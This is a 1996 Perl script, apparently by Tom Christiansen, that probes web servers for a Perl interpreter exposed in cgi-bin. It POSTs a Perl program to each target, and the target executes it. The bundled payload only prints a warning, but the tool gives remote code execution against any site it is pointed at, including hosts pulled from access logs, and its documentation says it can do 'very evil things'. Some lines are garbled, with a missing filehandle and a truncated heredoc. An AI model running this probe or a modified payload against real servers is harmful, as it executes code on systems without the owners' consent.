#!/usr/bin/perl -w # ############################################################################## # latrodectus cyberneticus - probe web for insecure perl installations # tchrist@perl.com # version 1.0, Thu Mar 28 17:53:42 MST 1996 # # requires the LWP library, fetchable from the CPAN multiplexor at # http://www.perl.com/cgi-bin/cpan_mod?module=LWP ############################################################################## require 5.002; use strict; use LWP::UserAgent; =head1 NAME latrodectus cyberneticus - probe web for insecure perl installations =head1 SYNOPSIS Via command line arguments: latro host1 //host2/bincgi //host3/bincgi/badperl or via STDIN: sed 's/ .*//' access_log | sort -u | latro =head1 DESCRIPTION B is designed to probe whether your site or sites you control have been compromised by the insanely idiotic practice of placing a perl executable in the cgi-bin. If you have ever seen anyone post a URL like http://dummy.org/cgi-bin/perl.exe?FMH.pl then you know they have the problem. This is pathetically pervasive amongst (horrifically mismanaged) sub-Unix web sites. =head1 USE AND MISUSE Robert Heinlein once wrote: "Stupidity cannot be cured with money, or through education, or by legislation. Stupidity is not a sin, the victim can't help being stupid. But stupidity is the only universal capital crime; the sentence is death, there is no appeal, and execution is carried out automatically and without pity." Consider this program such execution -- or at least the threat thereof. You can do very evil things with this program. Very evil things. You can execute I on their site. Please don't do anything (too) wicked. When you find such sites, please do the responsible and professional thing and mail their cluefully challenged webmaster about the problem. My goal with this program is to shake up the web a little bit now lest a I poison spider should someday rip it to shreds and blame perl. It's not perl's fault. It's the idiocy of the PC web sites -- and the vendors and docs that tell them to do this ineffably idiotic and evil thing. =head1 AUTHOR Tom Christiansen Last update: Thu Mar 28 17:53:42 MST 1996 =cut my $PROGNAME = "latrodectus cyberneticus"; my $VERSION = "1.0"; my $DEF_CGI_BIN = "/cgi-bin"; my $DEF_PERL_PATH = "/perl.exe"; my $PROGRAM = join qq===>; $| = 1; #use LWP::Debug qw(level); #level('+'); if (@ARGV) { for (@ARGV) { probe($_) } } elsif (!-t STDIN) { while () { chomp; probe($_); } } else { die "usage: $0 [site ...]\n"; } sub probe { my $site = shift; my $cgi_bin = ''; my $perl_path = ''; my $pre_site = ''; my $res_type = ''; if ($site !~ m#/#) { $cgi_bin = $DEF_CGI_BIN; } if ($site !~ /perl/) { $perl_path = $DEF_PERL_PATH; } if ($site !~ m#^//#) { $pre_site = '//'; } if ($site !~ /^http:/) { $res_type = 'http:'; } my $ua = LWP::UserAgent->new(); $ua->agent("$PROGNAME, v$VERSION"); my $full_targ = $res_type . $pre_site . $site . $cgi_bin . $perl_path; printf "%-35s ", $site; my $req = HTTP::Request->new( POST => $full_targ ); $req->content_type('application/x-www-form-urlencoded'); $req->content($PROGRAM); my $res = $ua->request($req); # check the outcome if ($res->is_success) { if ($res->content =~ /WWW Black Widow/) { print "<<<< COMPROMISED >>>\n"; } else { my $oops = $res->content; $oops =~ s/\n/ /g; print "APPREHENDED: $oops\n"; } } else { my $oops = $res->code . " " . $res->message; if ($res->code == 404) { print "SAFE: $oops"; } else { print "ERROR: $oops"; } print "\n" unless $oops =~ /\n$/; } } __END__ # Here begins the remote program. Whatsoever you place # within this code shall be executed on the foreign system, # without checks, without pity, and without remorse. # # Play nicely. print <; print "If I were nasty, you'd be spiderfood by now.\n"; print "\n\n\t--the black widow\n"; __END__